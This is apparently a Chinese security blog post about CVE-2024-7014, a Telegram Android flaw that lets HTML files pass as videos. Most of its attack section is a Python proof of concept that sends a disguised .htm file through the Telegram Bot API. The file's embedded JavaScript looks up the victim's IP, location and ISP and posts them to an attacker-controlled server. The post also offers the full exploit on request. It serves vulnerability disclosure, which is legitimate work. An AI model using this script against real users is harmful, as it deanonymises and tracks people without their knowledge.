漏洞细节:
该漏洞源于Telegram对多媒体文件附件验证不当,导致攻击者能够将恶意应用程序伪装成视频文件发送给用户。当用户打开这些伪装的文件时,可能会在不知情的情况下执行恶意代码,危及设备安全。
影响范围:
此漏洞影响Telegram Android应用程序版本10.14.4及之前的版本。建议受影响的用户尽快将应用程序更新至最新版本,以防范潜在的攻击。
技术细节
Evilloader是一种加载器,允许攻击者在目标系统上下载并运行额外的恶意负载。CVE-2024-7014描述了该模块在反分析机制方面的更新。在此场景中,伪装的视频引导受害者打开一个恶意网页,随后发送IP记录器。
漏洞详情
漏洞的主要原因是Telegram服务器将“.htm”文件格式误识别为视频文件。“.htm”代码片段在浏览器中以“content://”形式打开。
即:通过URI路径在浏览器中打开内容。
content://org.telegram.messenger.provider/media/Android/data/org.telegram.messenger/files/Telegram/Telegram%20Video/4_5924894289476721732.htm通过此内容,可以触发并打开所需的HTML页面。
利用场景(IP记录器)
当受害者无法在视频播放器中打开该文件时(因为期望的视频格式不存在),可能会转而使用默认浏览器打开,或者如果识别出是“HTML文件”,则双击在浏览器中打开。这样,嵌入的恶意JavaScript就会被执行。
受害者通过Telegram下载该文件,以为是视频,实际在浏览器中执行了HTML内容,导致IP信息被发送到攻击者的服务器。
tg.py
以下代码展示了如何通过Telegram API发送伪装成视频的“.htm”文件:
import requestsBOT_TOKEN = "your_bot_token"CHAT_ID = "your_chat_id"html_content = """<htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width, initial-scale=1.0"><script>fetch('http://ip-api.com/json').then(response => response.json()).then(data => {fetch('http://192.168.137.1:5000/log_ip', {method: 'POST',headers: {'Content-Type': 'application/json'},body: JSON.stringify({ip: data.query,country: data.country,region: data.regionName,city: data.city,isp: data.isp})});}).catch(error => console.error('Error fetching IP:', error));</script></head><body></body></html>"""html_path = "testv.mp4"with open(html_path, "w") as file:file.write(html_content)files = {"video": ("a.htm",open(html_path, "rb"),"video/mp4")}url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo"data = {"chat_id": CHAT_ID, "supports_streaming": False}response = requests.post(url, data=data, files=files)if response.status_code == 200:print("message sent")else:print(f"error: {response.text}")
在此代码中,“.htm”扩展名的内容被伪装成“视频”,并通过Telegram API发送。在Android设备上打开此文件的用户,实际上是在执行包含JavaScript的HTML页面。
以下视频展示了“恶意软件和IP记录器场景的实现方式:
完整POC后台回复:
telegram-video原文始发于微信公众号(Secu的矛与盾):Telegram 的 CVE-2024-7014 漏洞利用细节
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论